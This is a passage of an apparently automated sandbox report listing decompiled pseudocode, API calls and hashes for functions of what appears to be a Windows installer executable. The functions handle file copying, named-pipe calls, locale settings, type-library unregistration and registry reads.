                                                            • Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B740C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 145fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E006B740C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				struct HWND__* _v12;
				void* _v16;
				char _v20;
				char _v24;
				char _v28;
				struct HWND__* _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				WCHAR* _t41;
				intOrPtr _t42;
				int _t44;
				intOrPtr* _t54;
				void* _t68;
				intOrPtr _t80;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t118;

				_t118 = __fp0;
				_t106 = __esi;
				_t105 = __edi;
				_t88 = __ecx;
				_t87 = __ebx;
				_t108 = _t109;
				_t110 = _t109 + 0xffffffd4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v24 = 0;
				_v48 = 0;
				_v44 = 0;
				_v20 = 0;
				_v8 = 0;
				_push(_t108);
				_push(0x6b75fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t110;
				E005C75E4( &_v20, __ebx, __ecx, __eflags);
				if(E0060D3B4(_v20, __ebx,  &_v8, __edi, __esi) == 0) {
					_push(_t108);
					_push( *[fs:eax]);
					 *[fs:eax] = _t110;
					E0060D8B0(0, _t87, _v8, __edi, __esi);
					_pop(_t104);
					_t88 = 0x6b746f;
					 *[fs:eax] = _t104;
				}
				_t41 = E0040B278(_v8);
				_t42 =  *0x6d68d0; // 0x0
				_t44 = CopyFileW(E0040B278(_t42), _t41, 0);
				_t113 = _t44;
				if(_t44 == 0) {
					_t80 =  *0x6cded8; // 0x6d5c28
					_t11 = _t80 + 0x208; // 0x0
					E006B68EC( *_t11, _t87, _t88, _t106, _t113);
				}
				SetFileAttributesW(E0040B278(_v8), 0x80);
				_v12 = E00414DA0(0, L"STATIC", 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0);
				 *0x6d68fc = SetWindowLongW(_v12, 0xfffffffc, E006B6AB0);
				_push(_t108);
				_push(0x6b75c3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t110;
				_t54 =  *0x6cdec4; // 0x6d579c
				SetWindowPos( *( *_t54 + 0x188), 0, 0, 0, 0, 0, 0x97);
				E005C6FB0(0, _t87,  &_v44, _t105, _t106);
				_v40 = _v44;
				_v36 = 0x11;
				_v32 = _v12;
				_v28 = 0;
				E004244F8(L"/SECONDPHASE=\"%s\" /FIRSTPHASEWND=$%x ", 1,  &_v40,  &_v24);
				_push( &_v24);
				E005C6E90( &_v48, _t87, _t106, 0);
				_pop(_t68);
				E0040B470(_t68, _v48);
				_v16 = E006B6998(_v8, _t87, _v24, _t105, _t106, _t118);
				do {
				} while (E006B6A74() == 0 && MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0x4ff) == 1);
				CloseHandle(_v16);
				_pop(_t102);
				 *[fs:eax] = _t102;
				_push(E006B75CA);
				return DestroyWindow(_v12);
			}


























                                                            0x006b740c
                                                            0x006b740c
                                                            0x006b740c
                                                            0x006b740c
                                                            0x006b740c
                                                            0x006b740d
                                                            0x006b740f
                                                            0x006b7412
                                                            0x006b7413
                                                            0x006b7414
                                                            0x006b7417
                                                            0x006b741a
                                                            0x006b741d
                                                            0x006b7420
                                                            0x006b7423
                                                            0x006b7428
                                                            0x006b7429
                                                            0x006b742e
                                                            0x006b7431
                                                            0x006b7437
                                                            0x006b7449
                                                            0x006b744d
                                                            0x006b7453
                                                            0x006b7456
                                                            0x006b7460
                                                            0x006b7467
                                                            0x006b7469
                                                            0x006b746a
                                                            0x006b746a
                                                            0x006b747e
                                                            0x006b7484
                                                            0x006b748f
                                                            0x006b7494
                                                            0x006b7496
                                                            0x006b7498
                                                            0x006b749d
                                                            0x006b74a3
                                                            0x006b74a3
                                                            0x006b74b6
                                                            0x006b74e2
                                                            0x006b74f5
                                                            0x006b74fc
                                                            0x006b74fd
                                                            0x006b7502
                                                            0x006b7505
                                                            0x006b7517
                                                            0x006b7525
                                                            0x006b7533
                                                            0x006b753b
                                                            0x006b753e
                                                            0x006b7545
                                                            0x006b7548
                                                            0x006b7559
                                                            0x006b7561
                                                            0x006b7565
                                                            0x006b756d
                                                            0x006b756e
                                                            0x006b757e
                                                            0x006b7581
                                                            0x006b7586
                                                            0x006b75a7
                                                            0x006b75ae
                                                            0x006b75b1
                                                            0x006b75b4
                                                            0x006b75c2

                                                            APIs
                                                              • Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                              • Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
                                                            • SetWindowLongW.USER32 ref: 006B74F0
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006B7599
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7
                                                              • Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                            • DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                            • String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                            • API String ID: 1779715363-1630723103
                                                            • Opcode ID: 590c0ad9364cb792a84a58c9118fcebc7ede51f51827efcc5232604c532853bb
                                                            • Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
                                                            • Opcode Fuzzy Hash: 590c0ad9364cb792a84a58c9118fcebc7ede51f51827efcc5232604c532853bb
                                                            • Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00625FC4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 55%
                                                            			E00625FC4(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, char _a4) {
				intOrPtr _v8;
				long _v12;
				void* _v16;
				struct _OVERLAPPED _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _t83;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				intOrPtr _t101;

				_t99 = _t100;
				_t101 = _t100 + 0xffffffd8;
				_v40 = 0;
				_v44 = 0;
				_v8 = __eax;
				_push(_t99);
				_push(0x626202);
				_push( *[fs:eax]);
				 *[fs:eax] = _t101;
				 *(_v8 + 0x14) =  *(_v8 + 0x14) + 1;
				 *(_v8 + 0x20) =  *(_v8 + 0x14);
				 *((intOrPtr*)(_v8 + 0x24)) = __edx;
				 *((intOrPtr*)(_v8 + 0x28)) = __ecx;
				_t83 = 0xc + __ecx;
				_push(_t99);
				_push(0x6261a7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t101;
				_v16 = CreateEventW(0, 0xffffffff, 0, 0);
				if(_v16 == 0) {
					E0060CE84(L"CreateEvent");
				}
				_push(_t99);
				_push(0x62613c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t101;
				E00407760( &_v36, 0x14);
				_v36.hEvent = _v16;
				if(TransactNamedPipe( *(_v8 + 0xc), _v8 + 0x20, _t83, _v8 + 0x4034, 0x14,  &_v12,  &_v36) != 0) {
					_pop(_t94);
					 *[fs:eax] = _t94;
					_push(E00626143);
					return CloseHandle(_v16);
				} else {
					if(GetLastError() != 0x3e5) {
						E0060CE84(L"TransactNamedPipe");
					}
					_push(_t99);
					_push(0x62610e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t101;
					if(_a4 != 0 &&  *((short*)(_v8 + 0x1a)) != 0) {
						do {
							 *((intOrPtr*)(_v8 + 0x18))();
						} while (MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0x4ff) == 1);
					}
					_pop( *[fs:0x0]);
					_push(E00626115);
					GetOverlappedResult( *(_v8 + 0xc),  &_v36,  &_v12, 0xffffffff);
					return GetLastError();
				}
			}














                                                            0x00625fc5
                                                            0x00625fc7
                                                            0x00625fcf
                                                            0x00625fd2
                                                            0x00625fd5
                                                            0x00625fda
                                                            0x00625fdb
                                                            0x00625fe0
                                                            0x00625fe3
                                                            0x00625fe9
                                                            0x00625ff5
                                                            0x00625ffb
                                                            0x00626001
                                                            0x00626009
                                                            0x0062600d
                                                            0x0062600e
                                                            0x00626013
                                                            0x00626016
                                                            0x00626026
                                                            0x0062602d
                                                            0x00626034
                                                            0x00626034
                                                            0x0062603b
                                                            0x0062603c
                                                            0x00626041
                                                            0x00626044
                                                            0x00626051
                                                            0x00626059
                                                            0x00626085
                                                            0x00626127
                                                            0x0062612a
                                                            0x0062612d
                                                            0x0062613b
                                                            0x0062608b
                                                            0x00626095
                                                            0x0062609c
                                                            0x0062609c
                                                            0x006260a3
                                                            0x006260a4
                                                            0x006260a9
                                                            0x006260ac
                                                            0x006260b3
                                                            0x006260bf
                                                            0x006260c5
                                                            0x006260dc
                                                            0x006260bf
                                                            0x006260e1
                                                            0x006260eb
                                                            0x00626101
                                                            0x0062610d
                                                            0x0062610d

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006260D7
                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
                                                            • GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                            • String ID: CreateEvent$TransactNamedPipe
                                                            • API String ID: 2182916169-3012584893
                                                            • Opcode ID: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                            • Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
                                                            • Opcode Fuzzy Hash: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                            • Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040DF90, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E0040DF90(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40e094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x6d1c14);
				if(_t28 !=  *0x6d1c2c) {
					LeaveCriticalSection(0x6d1c14);
					E0040A1C8(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x6d1c10 == 0) {
							_t18 = E0040DC78(_t28, _t28, _t44, __edi, _t44);
							L00405254();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E0040B470(_t44, E0040E0AC);
								}
								L00405254();
								E0040DC78(_t18, _t28,  &_v8, _t42, _t44);
								E0040B470(_t44, _v8);
							}
						} else {
							E0040DE74(_t28, _t44);
						}
					}
					EnterCriticalSection(0x6d1c14);
					 *0x6d1c2c = _t28;
					E0040DAF8(0x6d1c2e, E0040B278( *_t44), 0xaa);
					LeaveCriticalSection(0x6d1c14);
				} else {
					E0040B318(_t44, 0x55, 0x6d1c2e);
					LeaveCriticalSection(0x6d1c14);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040E09B);
				return E0040A1C8( &_v8);
			}









                                                            0x0040df90
                                                            0x0040df93
                                                            0x0040df95
                                                            0x0040df96
                                                            0x0040df97
                                                            0x0040df99
                                                            0x0040df9d
                                                            0x0040df9e
                                                            0x0040dfa3
                                                            0x0040dfa6
                                                            0x0040dfae
                                                            0x0040dfba
                                                            0x0040dfe1
                                                            0x0040dfe8
                                                            0x0040dffa
                                                            0x0040e003
                                                            0x0040e014
                                                            0x0040e019
                                                            0x0040e021
                                                            0x0040e026
                                                            0x0040e02f
                                                            0x0040e02f
                                                            0x0040e034
                                                            0x0040e03c
                                                            0x0040e046
                                                            0x0040e046
                                                            0x0040e005
                                                            0x0040e009
                                                            0x0040e009
                                                            0x0040e003
                                                            0x0040e050
                                                            0x0040e055
                                                            0x0040e06f
                                                            0x0040e079
                                                            0x0040dfbc
                                                            0x0040dfc8
                                                            0x0040dfd2
                                                            0x0040dfd2
                                                            0x0040e080
                                                            0x0040e083
                                                            0x0040e086
                                                            0x0040e093

                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                            • IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                            • EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                            • String ID: en-US,en,
                                                            • API String ID: 975949045-3579323720
                                                            • Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                            • Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
                                                            • Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                            • Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00624704, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 25%
                                                            			E00624704(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				void* _t28;
				intOrPtr* _t30;
				intOrPtr _t33;
				intOrPtr* _t37;
				intOrPtr* _t49;
				intOrPtr _t61;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t70;
				intOrPtr _t71;

				_t70 = _t71;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t68 = __eax;
				_push(_t70);
				_push(0x62481e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71;
				_t66 = E00414020(__ebx, _t68, GetModuleHandleW(L"OLEAUT32.DLL"), L"UnRegisterTypeLib");
				_t49 = _t66;
				if(_t66 == 0) {
					E0060CE84(L"GetProcAddress");
				}
				E005C52C8(_t68,  &_v20, _t70);
				E0040B368( &_v8, _v20);
				_push(E0040EC28( &_v12));
				_t28 = E0040AEF4(_v8);
				_push(_t28);
				L0043C244();
				if(_t28 != 0) {
					E0060CE98(L"LoadTypeLib", _t49, _t28, _t68);
				}
				_push( &_v16);
				_t30 = _v12;
				_push(_t30);
				if( *((intOrPtr*)( *_t30 + 0x1c))() != 0) {
					E0060CE98(L"ITypeLib::GetLibAttr", _t49, _t32, _t68);
				}
				_push(_t70);
				_push(0x6247f1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t71;
				_t33 = _v16;
				_push( *((intOrPtr*)(_t33 + 0x14)));
				_push( *((intOrPtr*)(_t33 + 0x10)));
				_push( *(_t33 + 0x1a) & 0x0000ffff);
				_push( *(_t33 + 0x18) & 0x0000ffff);
				_push(_t33);
				if( *_t49() != 0) {
					E0060CE98(L"UnRegisterTypeLib", _t49, _t34, _t68);
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_t37 = _v12;
				return  *((intOrPtr*)( *_t37 + 0x30))(_t37, _v16, E006247F8);
			}

















                                                            0x00624705
                                                            0x00624709
                                                            0x0062470a
                                                            0x0062470b
                                                            0x0062470c
                                                            0x0062470d
                                                            0x0062470e
                                                            0x00624710
                                                            0x00624714
                                                            0x00624715
                                                            0x0062471a
                                                            0x0062471d
                                                            0x00624735
                                                            0x00624737
                                                            0x0062473b
                                                            0x00624742
                                                            0x00624742
                                                            0x0062474c
                                                            0x00624757
                                                            0x00624764
                                                            0x00624768
                                                            0x0062476d
                                                            0x0062476e
                                                            0x00624775
                                                            0x0062477e
                                                            0x0062477e
                                                            0x00624786
                                                            0x00624787
                                                            0x0062478a
                                                            0x00624792
                                                            0x0062479b
                                                            0x0062479b
                                                            0x006247a2
                                                            0x006247a3
                                                            0x006247a8
                                                            0x006247ab
                                                            0x006247ae
                                                            0x006247b4
                                                            0x006247b8
                                                            0x006247bd
                                                            0x006247c2
                                                            0x006247c3
                                                            0x006247c8
                                                            0x006247d1
                                                            0x006247d1
                                                            0x006247d8
                                                            0x006247db
                                                            0x006247e7
                                                            0x006247f0

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0062481E,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0062A1C5,00000000,0062A1D9), ref: 0062472A
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062476E
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                            • API String ID: 1914119943-2711329623
                                                            • Opcode ID: 222b5e7ee090e2c4018f0ee27552968bac4b15f90272fda75f58545e40cad072
                                                            • Instruction ID: 47cd072b4b06506b06a7a0fd2e311c11a36de303591e536be68bff5c72022a6e
                                                            • Opcode Fuzzy Hash: 222b5e7ee090e2c4018f0ee27552968bac4b15f90272fda75f58545e40cad072
                                                            • Instruction Fuzzy Hash: 19219171610A146FDB14EFA9EC42D6B77EEEF897407124469F410D3291EF78EC008B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C7FF4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E005C7FF4(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x5c80ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E00414020(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E00429D18() != 2) {
						if(E005C7A14(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E005C793C();
							RegCloseKey(_v12);
						}
					} else {
						if(E005C7A14(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E005C793C();
							RegCloseKey(_v12);
						}
					}
					E0040B4C8( &_v20, _v8, 0x5c8204);
					E00407870(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E005C80F5);
				E0040A1C8( &_v20);
				return E0040A1C8( &_v8);
			}










                                                            0x005c7ffa
                                                            0x005c7ffd
                                                            0x005c8000
                                                            0x005c8005
                                                            0x005c8006
                                                            0x005c800b
                                                            0x005c800e
                                                            0x005c8021
                                                            0x005c8028
                                                            0x005c803b
                                                            0x005c8090
                                                            0x005c809d
                                                            0x005c80a6
                                                            0x005c80a6
                                                            0x005c803d
                                                            0x005c8058
                                                            0x005c8065
                                                            0x005c806e
                                                            0x005c806e
                                                            0x005c8058
                                                            0x005c80b6
                                                            0x005c80c1
                                                            0x005c80cc
                                                            0x005c80cc
                                                            0x005c802a
                                                            0x005c802a
                                                            0x005c802c
                                                            0x005c80d2
                                                            0x005c80d5
                                                            0x005c80d8
                                                            0x005c80e0
                                                            0x005c80ed

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-2401316094
                                                            • Opcode ID: f7e7be658f0a955c462c647893507e18f8cdc3df8b481e5329b6105bcbfa9dbc
                                                            • Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
